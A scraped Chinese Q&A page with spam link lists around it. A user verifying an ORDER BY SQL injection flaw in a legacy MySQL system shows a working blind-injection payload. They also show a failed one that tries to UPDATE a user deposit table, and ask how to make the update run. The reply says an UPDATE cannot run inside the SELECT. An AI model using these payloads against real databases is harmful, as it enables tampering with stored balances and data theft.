国产成人精品久久免费动漫-国产成人精品天堂-国产成人精品区在线观看-国产成人精品日本-a级毛片无码免费真人-a级毛片毛片免费观看久潮喷

您的位置:首頁技術文章
文章詳情頁

mysql - sql報錯原因?

瀏覽:98日期:2022-06-13 10:08:51

問題描述

發現一個正在維護的老系統的基于orderBy的sql注入漏洞,準備驗證一下,

我先執行這個sql注入,是可以的

SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (selectcasewhen(1=1)then1else(select depositfrom sysuser_user_deposit)end)=1 ASC LIMIT 20 OFFSET 0

但是當我執行這個帶update語句的sql時報錯了:

SELECT sysitem_item.item_id FROM sysitem_item `sysitem_item` ORDER BY (selectcasewhen(1=1)then1else(updatesysuser_user_depositsetdeposit=11)end)=1 ASC LIMIT 20 OFFSET 0

報錯

<code>#1064 - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ’update<br>sysuser_user_deposit<br>set<br>deposit=11)end)=1 ASC LIMIT 20 OFFSET 0’ at line 9</code>

我應該如何讓他執行update?

問題解答

回答1:

主體是select的時候,里面是不能update的,否則執行不了的,mybatis這種注入我試過,<select>里執行update直接報錯,注入不了

相關文章:
主站蜘蛛池模板: 99久久99热久久精品免费看 | 成人网18免费视频 | 韩国欧美一级毛片 | aaaaaa级特色特黄的毛片 | 亚洲成在人线免费视频 | 91久久香蕉国产线看 | 亚洲久久成人 | 久青草免费视频 | 久久久久久尹人网香蕉 | gdcm01果冻传媒 | 9久9久热精品视频在线观看 | 国产精品偷伦费观看 | 一个色综合久久 | 九九99香蕉在线视频免费 | 日韩综合久久 | 九九视频在线播放 | 国产一国产一有一级毛片 | 欧美三级色| 精品一区二区三区波多野结衣 | 岛国搬运工最新网地址 | 手机看片自拍日韩日韩高清 | 草久久免费视频 | 欧美久久一区二区 | 欧美性色高清生活片 | 一级一黄在线观看视频免费 | 成人免费观看一区二区 | 午夜性刺激免费视频观看不卡专区 | 色多多最新地址福利地址 | 香焦视频在线观看黄 | 91av视频在线 | 亚洲精品一区二区三区五区 | 老司机亚洲精品影院在线 | 韩国免费a级毛片 | 国产成人精品综合网站 | 在线人成精品免费视频 | 日朝欧美亚洲精品 | xxxxxxxxhd日本| 欧美国产精品亚洲精品第一区 | 国产成人一区二区三区 | 超级碰碰碰视频视频在线视频 | 久青草视频在线 |